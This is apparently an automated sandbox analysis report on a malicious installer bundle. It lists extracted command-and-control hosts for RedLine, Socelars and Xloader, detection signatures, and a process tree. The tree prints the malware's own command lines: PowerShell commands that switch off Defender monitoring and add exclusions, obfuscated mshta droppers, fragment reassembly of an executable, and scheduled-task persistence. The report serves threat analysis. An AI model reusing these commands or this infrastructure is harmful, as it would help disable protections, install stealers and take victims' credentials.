Resubmissions
28-10-2021 15:53
211028-tbqhfabhb2 1028-10-2021 05:27
211028-f5paksheak 1027-10-2021 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
1295s -
max time network
1776s -
submitted
01-01-1970 00:00
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
redline
Botnet
chris
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media26
C2
91.121.67.60:23325
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 55 IoCs
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 9 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 13 IoCs
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 25 IoCs
-
Drops file in Windows directory 30 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 48 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 15 IoCs
-
Modifies system certificate store 2 TTPs 13 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 13 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\1HegE8uhcrIdBIO7hH1TvyAE.exe"C:\Users\Admin\Pictures\Adobe Films\1HegE8uhcrIdBIO7hH1TvyAE.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\r5y3dnbVhvaXvp9RGdw3ItuO.exe"C:\Users\Admin\Pictures\Adobe Films\r5y3dnbVhvaXvp9RGdw3ItuO.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\VGa7nZ8cXrxZh9BQV_ujGsOW.exe"C:\Users\Admin\Pictures\Adobe Films\VGa7nZ8cXrxZh9BQV_ujGsOW.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 2887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\LpBGQQvHgLkawiCz7GISvG0P.exe"C:\Users\Admin\Pictures\Adobe Films\LpBGQQvHgLkawiCz7GISvG0P.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\d3iIex0FBgOMUXdGrqAqeumo.exe"C:\Users\Admin\Pictures\Adobe Films\d3iIex0FBgOMUXdGrqAqeumo.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv9⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
-
C:\Users\Admin\Pictures\Adobe Films\58_Gh9EN9Lb8VWqneFpJYvOy.exe"C:\Users\Admin\Pictures\Adobe Films\58_Gh9EN9Lb8VWqneFpJYvOy.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"C:\Users\Admin\Pictures\Adobe Films\uosNhDevxECoZCg2RjBNDOu3.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Y_osdk8mJb_nB0sAtjY0k2xz.exe"C:\Users\Admin\Pictures\Adobe Films\Y_osdk8mJb_nB0sAtjY0k2xz.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\z93OlYxWWofUlmQGlsJ6Xpnz.exe"C:\Users\Admin\Pictures\Adobe Films\z93OlYxWWofUlmQGlsJ6Xpnz.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 2409⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\xNtjdlK287WgXjukzr1KQeJU.exe"C:\Users\Admin\Pictures\Adobe Films\xNtjdlK287WgXjukzr1KQeJU.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\RU2LCevvTco4nqb5RobwPnmJ.exe"C:\Users\Admin\Pictures\Adobe Films\RU2LCevvTco4nqb5RobwPnmJ.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\RpWh1wdDSUB28_jw5ViPc12k.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "RpWh1wdDSUB28_jw5ViPc12k.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe"C:\Users\Admin\Pictures\Adobe Films\OQ2lnH_66KpEXpIlJZcYWeEi.exe" -u9⤵
-
C:\Users\Admin\Pictures\Adobe Films\4BF0hsnfOpSM5YBAYerqrhGy.exe"C:\Users\Admin\Pictures\Adobe Films\4BF0hsnfOpSM5YBAYerqrhGy.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\1zQM3dQPlUbXwp5zsXr0sQ5t.exe"C:\Users\Admin\Pictures\Adobe Films\1zQM3dQPlUbXwp5zsXr0sQ5t.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff61e539e70,0x7ff61e539e80,0x7ff61e539e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,3952657481001276805,10154194870497491833,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4468_1181016857" --mojo-platform-channel-handle=1740 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LO4Q4.tmp\S1T7xVIJa2NgRifld8Xt4mJM.tmp"C:\Users\Admin\AppData\Local\Temp\is-LO4Q4.tmp\S1T7xVIJa2NgRifld8Xt4mJM.tmp" /SL5="$10414,506127,422400,C:\Users\Admin\Pictures\Adobe Films\S1T7xVIJa2NgRifld8Xt4mJM.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NR2J0.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-NR2J0.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\fa-e20e9-a39-ffa88-e2c0d8208e96e\Vaefaeshamasu.exe"C:\Users\Admin\AppData\Local\Temp\fa-e20e9-a39-ffa88-e2c0d8208e96e\Vaefaeshamasu.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kmlzuqbx.lkd\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11560 -s 24014⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exeC:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe /qn CAMPAIGN="654"13⤵
- Enumerates connected drives
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\o4swqr11.xh3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exeC:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe"C:\Users\Admin\AppData\Local\Temp\4mfpgytr.vhw\any.exe" -u14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\5caynxju.3ib\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 24014⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqrxobxt.bss\autosubplayer.exe /S & exit12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\5jWUy2pAopKponnGFDTz_bfA.exe"C:\Users\Admin\Pictures\Adobe Films\5jWUy2pAopKponnGFDTz_bfA.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\YgIqEx4XFbtnbNHkQWDzV0CA.exe"C:\Users\Admin\Pictures\Adobe Films\YgIqEx4XFbtnbNHkQWDzV0CA.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\wbRhqAkI0KanJbU9cRxvnLg2.exe"C:\Users\Admin\Pictures\Adobe Films\wbRhqAkI0KanJbU9cRxvnLg2.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\MQe2V0B0vbPkFUADTZlxPeHQ.exe"C:\Users\Admin\Pictures\Adobe Films\MQe2V0B0vbPkFUADTZlxPeHQ.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 19808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\q3Vj1b7oC9dYMEZqxFYOF5x3.exe"C:\Users\Admin\Pictures\Adobe Films\q3Vj1b7oC9dYMEZqxFYOF5x3.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\NWXhkOhPxmA8QsCp0Poyf13J.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "NWXhkOhPxmA8QsCp0Poyf13J.exe" -F9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KA45E.tmp\8Px0xZGNRC1ER0CeVlJC0xnq.tmp"C:\Users\Admin\AppData\Local\Temp\is-KA45E.tmp\8Px0xZGNRC1ER0CeVlJC0xnq.tmp" /SL5="$202EE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"7⤵
